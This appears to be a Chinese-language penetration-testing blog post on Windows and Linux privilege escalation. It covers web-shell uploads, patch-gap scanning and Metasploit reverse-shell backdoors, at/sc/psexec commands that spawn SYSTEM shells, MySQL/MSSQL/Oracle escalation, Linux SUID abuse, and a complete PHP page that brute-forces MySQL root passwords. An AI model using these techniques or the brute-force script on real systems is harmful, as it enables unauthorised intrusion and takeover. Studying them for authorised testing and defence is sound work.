权限提升总结

权限划分

在windows中，权限大概分为四种，分别是User、Administrator、System、TrustedInstallerTrus

1.user：普通用户权限，是系统中最安全的权限（因为分配给改组的默认权限不允许成员操作修改操作系统的设置或用户资料）

2.Administrator： 管理员权限。可以利用windows的机制将自己提升为system权限，以便操作SAm文件

3.System： 系统权限。可以对sam等敏感文件进行读取，往往需要将administrator权限提升到system权限才可以对散列值进行DUmp操作

4.TrustedInstaller：window中的最高权限，对系统文件，即将拥有system权限也无法进行获取散列值、安装软件、修改防火墙规则、修改注册表等

纵向提权： 低权限角色获得高权限角色的权限，例如，一个webshell权限通过提权，拥有了管理员权限，这种提权就是纵向提权。

横向提权： 获取同级别角色的权限。

提权的方式

内核溢出漏洞提权

数据库类型提权

参考：【win权限提升】教你从0基础入门到精通，收藏这一篇就够了！_操作系统权限提升-CSDN博客

内网渗透基石篇--权限提升（上） - FreeBuf网络安全行业门户

内网渗透基石篇--权限提升（下） - FreeBuf网络安全行业门户

最全Windows提权总结（建议收藏） - 随风kali - 博客园 (cnblogs.com)

权限提升 | windows提权从不会到理解原理最后灵活使用工具 - FreeBuf网络安全行业门户

window基本命令

Web提权

获取网站权限后，我们仅仅只能对网站操作，无法对服务器进行操作，需要对服务器进行提权，获取到更高权限。

1.上传后门文件，获取到webshell权限

2.在web权限提升中，最常用的是溢出漏洞提权，用cmd去执行文件进行提权，从下图可以清晰的看到我们在webshell看到的权限和服务器上看到的权限是不一样的。

3.查看目标机器的补丁、操作系统 systeminfo命令

4.获取到补丁编号后，我们要进行补丁筛选，推荐两个优秀项目：wesng , windowsVulnScan。将上面收集到的信息保存到1.txt中，利用wesng进行补丁筛选

5.执行完后会将可能存在的漏洞保存在vuln.csv中

6.利用MSF或特定EXP进行提权（msf要搭建在外网，才能将会话反弹到本机，内网不能反弹）生成一个5577.exe后门，webshell执行该后门，反弹的端口号为5577

7.设置监听端口为5577

8.端口反弹的权限为web权限

9.利用wesng中收集到的漏洞编号，进行模块利用，并且设置反弹端口，此时的端口号应该与前面的不同，这个端口反弹的权限为提权后的权限，并且监听的回话为3，与上面的会话对应

10.成功反弹system权限

本地提权

获取本地普通用户的权限后，要将权限提升为更高权限，本地提权的成功概率比web提权更高。

利用at、sc、ps命令进行提权以及利用一些工具直接进行提权

案例演示
1.系统溢出漏洞提权
直接网上下载BitsArbitraryFileMoveExploit.exe,运行就可以提升为系统权限

2.AT命令提权:
at 13:36 /interactive cmd.exe (在13：36分生成一个交互式的System权限的cmd)
使用版本：Win2000 & Win2003 & XP

3.SC命令提权：
sc Create syscmd binPath= “cmd /K start” type= own type= interact #创建一个名叫syscmd的新的交互式的cmd服务
sc start syscmd #得到了system权限的cmd环境
适用版本：windows 7、8、03、08

4.PS命令提权
psexec.exe -accepteula -s -i -d cmd.exe
适用版本：Win2003 & Win2008

数据库提权

Mysql数据库提权
利用UDF提权
在利用UDF提权时前提是我们需要知道数据库的密码，而在正常情况下MySQL数据库不支持外连，此时如果我们用工具爆破不了，可以上传脚本进行爆破，脚本如下：

<html>
 <head>
  <title>Mysql账号密码爆破工具</title>
  <m eta http-equiv="Content-Type" content="text/html; charset=utf-8">
 </head>
 <body>
  <center>
   <br><br>
   <h1>MysqlDatab aseBlasting(Mysql账号密码在线爆破工具 V1.0)</h1>
  <br>
<?php
 if(@$_POST['submit']){
   $host = @$_POST['host'];
   if($host!=""){
    $username = "root";//用户名字典
    $password = array('','123456','admin','root123','ccf304vn'); //密码字典
    echo "<hr><br>--------------------爆破状态--------------------<br>";
    echo "密码错误次数：";
    for ($i=0; $i <= count($password); $i++) {
     if(@mysql_connect($host, $username, $password[$i])){
       echo "<br><br><font color='red'>爆破成功--密码-->".@$password[$i]."</font>";
       break;
     }else{
       echo $i."、";
       continue;
     }
    }
    echo "<br>--------------------爆破结束--------------------<br><hr>";
   }else{
    echo "<s cript>a lert('黑客，输入数据库IP地址')</s cript>";
   }
 }
?>
<br><br><br><br>
  <form action="MysqlDatab aseBlasting.php" method="post">
   数据库IP地址:<input type="text" name="host"/>
   <input type="submit" value="爆破" name="submit"/>
  </form>
<center>
</body>
 </html>

有些提权网上已经写得很完整，所以接下来有的提权过程就没有演示，这是我收集的比较好的文章，请大家参考。MySQL UDF提权执行系统命令_mysql udf运行系统命令-CSDN博客

2.Mssql数据库提权
请参考：通过Mssql提权的几种姿势 - N0r4h - 博客园 (cnblogs.com)

3.Oracle数据库提权
分为以下三种模式：
普通用户模式
前提是拥有一个普通的Oracle连接账号，不需要DBA，并以Oracle实例运行的权限执行操作系统命令。
DBA用户模式
拥有DBA账号密码，可以省去自己手动创建存储过程的繁琐步骤，一键执行测试。
注入提升模式
拥有一个Oracle注入点，可以通过注入点执行系统命令，此种模式没有实现回显，需要自己验证。
一般Oracle数据库利用这个工具进行提权（自带以上三种提权方式）

参考：Oracle数据库提权 - micr067 - 博客园 (cnblogs.com)

Linux操作系统提权

推荐两个开源的项目
信息收集脚本
LinEnum-master
漏洞探针脚本，获取可能存在的漏洞
linux-exploit-suggester
在进行linux提权时，推荐使用冰蝎，因为冰蝎里面有很多集成化功能，可以反弹shell到msf中。
案例演示
1.SUID提权
漏洞成因：在对文件进行权限设置时，给了文件suid权限，在执行该文件时，会调用特定用户
上传一个脚本到网站，利用冰蝎连接，设置反弹shell

在msf中执行上面的命令，web权限反弹到msf中

上传漏洞探针脚本，并执行，查看是否有suid提权的可能性

执行一下命令，成功提升为root用户
touch shenghuo
find shenghuo -exec whoami ;

参考：最详细Linux提权总结（建议收藏） - 随风kali - 博客园 (cnblogs.com)

【Web】超级详细的Linux权限提升一站式笔记-CSDN博客

参考博客：权限提升全集（完整版）-CSDN博客

大家要查看详细提权方法的话，我已经附上博客，大家跟着去学习就行了，多看看总不是什么坏事